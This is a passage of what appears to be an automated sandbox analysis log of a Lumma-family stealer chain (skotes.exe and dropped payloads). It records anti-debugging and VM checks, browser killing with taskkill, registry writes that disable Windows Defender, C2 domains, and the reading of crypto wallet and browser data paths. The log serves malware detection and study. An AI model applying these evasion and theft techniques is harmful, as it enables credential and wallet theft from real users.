Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: skotes.exe, skotes.exe, 00000006.00000002.3020842018.0000000000294000.00000040.00000001.01000000.00000008.sdmp, Lumma111.exe, Lumma111.exe, 00000009.00000002.2584553556.000000000056D000.00000040.00000001.01000000.0000000B.sdmp, cfc45d1c7c.exe, cfc45d1c7c.exe, 0000000A.00000002.3020466673.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000000B.00000002.2748229015.0000000000528000.00000040.00000001.01000000.0000000D.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3020511421.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000001E.00000002.2936782948.0000000000528000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~}
Source: firefox.exe, 0000002E.00000002.3053234298.000002086D9F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000131F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(e6
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3026230635.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2589470745.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2585677773.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2589470745.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001364000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000000B.00000002.2749590843.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000134E000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000001E.00000002.2943159738.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001F.00000002.2940229329.000001994D617000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware6
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000134E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~i
Source: file.exe, 00000000.00000002.1812779261.0000000000BC4000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1838874066.0000000000294000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1839210797.0000000000294000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3020842018.0000000000294000.00000040.00000001.01000000.00000008.sdmp, Lumma111.exe, 00000009.00000002.2584553556.000000000056D000.00000040.00000001.01000000.0000000B.sdmp, cfc45d1c7c.exe, 0000000A.00000002.3020466673.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000000B.00000002.2748229015.0000000000528000.00000040.00000001.01000000.0000000D.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3020511421.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000001E.00000002.2936782948.0000000000528000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 00000010.00000002.2817490674.000001F7A3248000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928265482.000001994D29A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2942305835.000001994DA40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2937739211.000001B63A580000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_04A500DD Start: 04A504CD End: 04A500F8 6_2_04A500DD
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053A0E2D rdtsc 0_2_053A0E2D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000D652B mov eax, dword ptr fs:[00000030h] 6_2_000D652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000DA302 mov eax, dword ptr fs:[00000030h] 6_2_000DA302
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 5800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 6596, type: MEMORYSTR
Source: Lumma111.exe String found in binary or memory: p3ar11fter.sbs
Source: Lumma111.exe String found in binary or memory: 3xp3cts1aim.sbs
Source: Lumma111.exe String found in binary or memory: peepburry828.sbs
Source: Lumma111.exe String found in binary or memory: p10tgrace.sbs
Source: Lumma111.exe String found in binary or memory: processhol.sbs
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe "C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe "C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe "C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe"
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 064deba48e.exe, 0000000D.00000002.2856707163.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, 064deba48e.exe, 00000022.00000002.3021178012.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.3020842018.0000000000294000.00000040.00000001.01000000.00000008.sdmp, Lumma111.exe, Lumma111.exe, 00000009.00000002.2584553556.000000000056D000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Program Manager
Source: 686764db73.exe, 0000000B.00000002.2748229015.0000000000528000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: qProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000BD3E2 cpuid 6_2_000BD3E2
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000BCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_000BCBEA
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry value created: TamperProtection 0
Source: cfc45d1c7c.exe, 0000000A.00000003.2802924408.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2784475284.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2783308576.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2854456366.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2774224287.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2853943836.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2774972307.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935431689.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2774224287.00000000013D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
Source: cfc45d1c7c.exe, 0000000A.00000003.2853303598.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 1.2.skotes.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1812668708.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1798707476.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1839124427.00000000000A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3019605057.00000000000A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1772336751.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1798579640.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2277265431.0000000004840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1838802300.00000000000A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2776187475.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 5660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 4148, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 2708, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001E.00000002.2934072138.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2746064201.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2705375842.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2842925428.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 5800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 6596, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: cfc45d1c7c.exe String found in binary or memory: Wallets/Electrum-LTC
Source: cfc45d1c7c.exe String found in binary or memory: Wallets/ElectronCash
Source: cfc45d1c7c.exe String found in binary or memory: window-state.json
Source: cfc45d1c7c.exe String found in binary or memory: Jaxx Liberty
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"j
Source: cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: cfc45d1c7c.exe, 0000000A.00000003.2669358178.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance<
Source: cfc45d1c7c.exe String found in binary or memory: %appdata%\Ethereum
Source: cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live.
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
